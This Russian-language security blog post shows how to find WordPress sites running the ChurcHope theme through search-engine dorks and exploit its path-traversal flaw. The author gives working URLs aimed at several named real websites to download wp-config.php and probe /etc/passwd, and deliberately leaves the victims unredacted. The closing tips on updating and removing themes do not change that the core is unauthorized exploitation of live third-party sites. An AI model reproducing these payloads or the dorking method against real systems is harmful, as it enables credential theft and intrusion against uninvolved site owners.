Наш канал в telegram канал codeby

Пишем об информационной безопасности, методах защиты информации, о программировании. Не пропускай новости с кодебай, будь в тренде !  Подробнее ...

В процессе написания урока по сканерам уязвимостей для WordPress я обнаружил новый для меня факт — сканер изучает также и темы. Т.е. темы WordPress могут быть уязвимыми. Раньше про темы я думал, что это набор .css, .js, .htm, .png, .jpg и .bmp файлов. Что там нет ничего интересного для взломщиков и, следовательно, владельцу сайта (блога) на WordPress не нужно беспокоиться о каких-либо вопросах, связанных с безопасностью тем.

Это нет так, я очень сильно ошибался! Посмотрите сами — темы содержат .php файлы, в которых, как и в любых программах, могут быть уязвимости. Я не буду вас мучить теорией, я просто продемонстрирую на очень простом примере.

За свежими дырами зайдём на этот сайт. Ищим там «Latest Theme Vulnerabilities» (последние уязвимости в темах):

01

Я беру первую попавшуюся тему, она называется «ChurcHope Theme». Её уязвимость заключается в возможности скачать любой файл с сервера:

02

Радует, что сразу приведены примеры использования:

Т.е. вместо [host] нужно вставить адре сайта на WordPress, в котором используется эта тема.

Осталось дело за малым — найти эти сайты.

Нам поможет duckduckgo.com или Гугл (от Яндекса толку мало). В строке поиска я ввожу что-нибудь вроде themes/churchope (часть адреса, по которой расположена нужная тема):

03

Результаты не заставят себя долго ждать. Первым попался сайт http://thenewcentral.com/

Т.е. просто переходим по адресу

http://thenewcentral.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

И получаем файл конфига:

04


Чат codeby в telegram перезагрузка

Обсуждаем вопросы информационной безопасности, методы защиты информации, программирование. Задавайте свои вопросы и комментируйте чужие.  Подробнее ...

По адресу

http://thenewcentral.com/wp-content/themes/churchope/lib/downloadlink.php?file=/etc/passwd

я не получил никаких паролей, но сообщение об ошибке спалило абсолютные пути расположения файлов сайта на хостинге. Я намерено ничего на замазываю. Дети, смотрите и учитесь: этот дядя не думал о безопасности своих веб-приложений.

051

Ну всё понятно, просто для закрепления:

http://papitodios.com//wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

06

Не смотря на то, что попадается предостаточно уязвимых сайтов с этой темой, некоторые сайты, даже не смотря на безалаберность владельцев, уверенно показывали фак:

http://roland.co.in/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

07

Mod_Security в действии:

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Выводы

  1. Обновляйте свои темы WordPress сразу, как только к ним выходят обновления.
  2. Удаляйте темы, которые вы в данный момент не используйте.
  3. Время от времени сканируйте свои сайты на предмет наличия известных уязвимостей. Некоторые темы заброшены их авторами, и для них никогда уже не будут выпущены обновления. И если в них присутствуют уязвимости, то другого способа у вас узнать об этом нет (разве что, ещё раньше ваш сайт взломают).
  4. Если я вас недостаточно убедил, то дополню — можно не только скачивать конфигурационные файлы, с которыми некоторые вообще не знают что делать. Можно закачивать произвольные файлы на сервера с уязвимыми темами.

Codeby.net совместно с PHDays 8

Объявляют о проведении грандиозного конкурса с умопомрачительными призами ! Получи бесплатно билет на PHDays 8, деньги, футболку с символикой codeby, а так же всеобщий респект и уважение. Подробнее ...

Похожие темы

О пентесте эмулированной корпоративной сети —... Очередная статья к вашему вниманию об пентесте эмулированной корпоративной сети.Сегодня мы с вами снова затроним Web Application Pentesting. ...
Развернутое сканирование c Metasploit... Перейти к содержанию полного руководства пользователя Metasploit на русском языке. Как работает развернутое сканирование Порты в развернутом с...
Утилита для автоматического создания бэкдоров: bac... Перевод: Анна Давыдова Источник: n0where.net Backdoorme - утилита для автоматического создания лазейки Backdoorme является мощной утили...
Как подменить DNS роутера Сегодня мы разберем поднятие нашего DNSChef. DNSChef - это DNS прокси, который поможет нам поднять фальшивый DNS, который мы подставим вместо нормал...
Вариант байпасса антивирусов с помощью языка C#... Привет, господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#. Обо всё предлагаю по порядку и для начала сгенерируем полезную н...